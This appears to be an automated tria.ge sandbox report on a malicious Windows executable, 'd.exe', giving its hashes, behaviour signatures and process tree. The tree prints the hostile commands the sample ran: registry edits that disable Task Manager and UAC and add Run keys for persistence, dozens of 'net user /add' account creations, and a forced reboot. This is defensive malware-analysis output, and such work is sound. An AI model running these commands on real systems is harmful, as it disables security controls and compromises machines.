Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
10s -
max time network
14s -
platform
windows10-1703_x64 -
resource
win10-20230220-es -
resource tags
-
submitted
02/04/2023, 13:41
Errors
Reason
Machine shutdown
General
-
Target
d.exe
-
Size
130KB
-
MD5
29b5eb1472c4de55ea35adc57f9bbca5
-
SHA1
d4187fb7bbc4a4a03393e0f37f451227c9a3420e
-
SHA256
b0e2ea2424bbbacdd3a9f11eb87a05517e24b36aa793c033e491e1c6a5647b3d
-
SHA512
2ae14a8d8856f60c0ad37c04ce521dc387717c2f63ba45d4a808f50cce826cbfdf7b3f1239ae29f46fe14ab75da6b312a90a85a7203b7ff5f05ec8d5254fb28e
-
SSDEEP
3072:0V3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPiVV:Zt5hBPi0BW69hd1MMdxPe9N9uA069TBE
Score
10/10
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Disables Task Manager via registry modification
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 4 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\d.exe"C:\Users\Admin\AppData\Local\Temp\d.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\939A.tmp\939B.tmp\939C.bat C:\Users\Admin\AppData\Local\Temp\d.exe"2⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msg.vbs"3⤵
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\net.exenet user 28009 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 28009 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 25058 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 25058 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 23295 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 23295 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 5760 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 5760 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 12323 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 12323 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 31924 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 31924 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 4287 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 4287 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 21721 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 21721 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 32651 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 32651 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 29537 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29537 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 29006 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29006 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 2990 /add3⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\net.exenet user 24261 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 24261 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 8903 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 8903 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 29468 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29468 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 28799 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 28799 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 8929 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 8929 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 27401 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 27401 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 6102 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 6102 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 22551 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 22551 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 13 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 13 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 22508 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 22508 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 823 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 823 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 16912 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 16912 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 30473 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 30473 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 10369 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 10369 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 29729 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29729 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 15769 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 15769 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 14043 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 14043 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 31237 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 31237 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 21484 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 21484 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 2935 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 2935 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 18115 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 18115 /add4⤵
-
-
-
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\d.bat /f3⤵
- Adds Run key to start application
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\d.bat /f3⤵
- Adds Run key to start application
- Modifies registry key
-
-
C:\Windows\system32\shutdown.exeshutdown -r -t 00 -c "blackhost virus maker"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 2990 /add1⤵
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\WaitUnprotect.m4a"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3ad2855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d734ebb2d1a46aad6f79e4ed263d4d40
SHA163f17dbfde5ee6cb75c4cf346b9e7709a0f0b8fb
SHA256559f3175f533116bfb441f4c15f18a706a558b40bed026d94779d977e8026709
SHA512832e14de24558b12af0ce6503766d21aaae87f2ad5411aca6a6d3e04245f151f1c14a4e3867efd5ac5f1a04436ca0415af49c83a24b068e14963e36691bc2091
-
Filesize
35B
MD5019dd451c91f63928aae37f251491212
SHA13507388e9feeec97a83106920a73e0d65157d3b5
SHA256c585e37e06e2901ccfdabef79b9318f254714382d5c8f97a020f5cfb2c084af8
SHA5122b31b9b1d17b5df8437a5a362188368ab458621f78aa7cbef5050a00376c1fff539eec4f152259dc973664b99ba6110f40ed3ca37b0371a25f88120a92fe4ddd
-
Filesize
130KB
MD529b5eb1472c4de55ea35adc57f9bbca5
SHA1d4187fb7bbc4a4a03393e0f37f451227c9a3420e
SHA256b0e2ea2424bbbacdd3a9f11eb87a05517e24b36aa793c033e491e1c6a5647b3d
SHA5122ae14a8d8856f60c0ad37c04ce521dc387717c2f63ba45d4a808f50cce826cbfdf7b3f1239ae29f46fe14ab75da6b312a90a85a7203b7ff5f05ec8d5254fb28e
-
Filesize
992KB
-
Filesize
208KB
-
Filesize
2.7MB
-
Filesize
96KB
-
Filesize
92KB
-
Filesize
68KB
-
Filesize
92KB
-
Filesize
68KB
-
Filesize
116KB
-
Filesize
68KB
-
Filesize
2.0MB
-
Filesize
16.7MB
-
Filesize
252KB
-
Filesize
132KB
-
Filesize
96KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
108KB
-
Filesize
68KB
-
Filesize
96KB
-
Filesize
192KB
-
Filesize
444KB
-
Filesize
412KB
-
Filesize
144KB
-
Filesize
160KB
-
Filesize
92KB
-
Filesize
344KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
76KB
-
Filesize
72KB
-
Filesize
132KB
-
Filesize
72KB
-
Filesize
1.2MB
-
Filesize
176KB
-
Filesize
140KB
-
Filesize
1.7MB
-
Filesize
368KB
-
Filesize
68KB
-
Filesize
604KB
-
Filesize
72KB
-
Filesize
2.2MB
-
Filesize
1.1MB
-
Filesize
212KB
-
Filesize
148KB
-
Filesize
68KB
-
Filesize
388KB
-
Filesize
68KB
-
Filesize
72KB
-
Filesize
76KB
-
Filesize
636KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
1.0MB
-
Filesize
68KB
-
Filesize
72KB
-
Filesize
68KB
-
Filesize
96KB
-
Filesize
88KB
-
Filesize
72KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
164KB